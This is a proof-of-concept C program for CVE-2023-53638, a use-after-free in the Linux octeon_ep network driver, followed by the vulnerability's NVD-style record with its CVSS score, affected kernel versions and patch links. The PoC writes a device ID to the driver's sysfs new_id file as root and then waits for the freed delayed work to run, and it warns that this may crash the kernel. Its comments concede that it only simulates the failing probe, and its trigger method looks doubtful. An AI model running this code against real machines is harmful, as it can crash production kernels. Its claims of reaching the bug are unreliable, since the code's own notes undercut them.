CVE-2023-53638

// PoC for CVE-2023-53638 - octeon_ep Use-After-Free // This PoC demonstrates the vulnerability trigger condition // Note: Requires root or CAP_NET_ADMIN to load/unload kernel modules #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <errno.h> // Simulate triggering octeon_ep probe failure // In a real scenario, this would involve manipulating hardware state // or using fault injection to cause MAC address retrieval to fail int trigger_probe_failure(void) { // Step 1: Attempt to bind octeon_ep device (requires hardware or VF) // In test environment, this requires actual octeon hardware or PCI passthrough int fd = open("/sys/bus/pci/drivers/octeon_ep/new_id", O_WRONLY); if (fd < 0) { perror("Failed to access octeon_ep driver"); return -1; } // Step 2: Write a device ID that will cause probe to fail at MAC address retrieval // The actual device ID depends on the specific Octeon hardware const char *dev_id = "177d:0093"; // Example Octeon device ID if (write(fd, dev_id, strlen(dev_id)) < 0) { perror("Failed to trigger probe"); close(fd); return -1; } close(fd); // Step 3: Wait for the delayed work to execute on freed memory // This will trigger the use-after-free printf("Waiting for delayed work to trigger UAF...\n"); sleep(5); return 0; } int main(int argc, char *argv[]) { printf("CVE-2023-53638 PoC - octeon_ep Use-After-Free\n"); printf("WARNING: This may crash the kernel!\n"); if (getuid() != 0) { fprintf(stderr, "This PoC requires root privileges\n"); return 1; } return trigger_probe_failure(); }

{"cve": {"id": "CVE-2023-53638", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:47.017", "lastModified": "2026-02-03T22:30:11.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteon_ep: cancel queued works in probe error path\n\nIf it fails to get the devices's MAC address, octep_probe exits while\nleaving the delayed work intr_poll_task queued. When the work later\nruns, it's a use after free.\n\nMove the cancelation of intr_poll_task from octep_remove into\noctep_device_cleanup. This does not change anything in the octep_remove\nflow, but octep_device_cleanup is called also in the octep_probe error\npath, where the cancelation is needed.\n\nNote that the cancelation of ctrl_mbox_task has to follow\nintr_poll_task's, because the ctrl_mbox_task may be queued by\nintr_poll_task."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.12", "matchCriteriaId": "03930E62-D711-4E00-A788-FFDE0D27F98C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc6:*:*:*:*:*:*", "matchCriteriaId": "5B1C14ED-ABC4-41D3-8D9C-D38C6A65B4DE"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/62312e2f6466b5f0a120542a38b410d88a34ed00", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/758c91078165ae641b698750a72eafe7968b3756", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}